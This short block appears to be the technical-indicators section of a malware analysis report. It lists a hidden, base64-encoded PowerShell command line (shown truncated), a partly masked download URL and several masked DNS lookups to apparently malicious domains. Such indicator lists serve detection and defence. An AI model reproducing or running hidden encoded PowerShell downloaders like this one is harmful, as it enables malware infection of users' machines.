Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABTAGUAaQBtAG0AZwBoAHAAYgB3AGkAcAA9ACcASwBuAGMAeQBwAHEAYwBwAHAAagB5AG4AaQAnADsAJABLAHcAdwBxAGYAYwB5AG8AaABiAHUAcwBkACAAPQAgACcAMwAzACcAOwAkAFoAYQB3AG0AbgBiAGM...
- http://qa##ome.com/dlkc3/f0x0011/
- DNS ASK in####mvietnam.com
- DNS ASK do###queens.com
- DNS ASK ru###un123.com
- DNS ASK re####iasigns.com
- DNS ASK qa##ome.com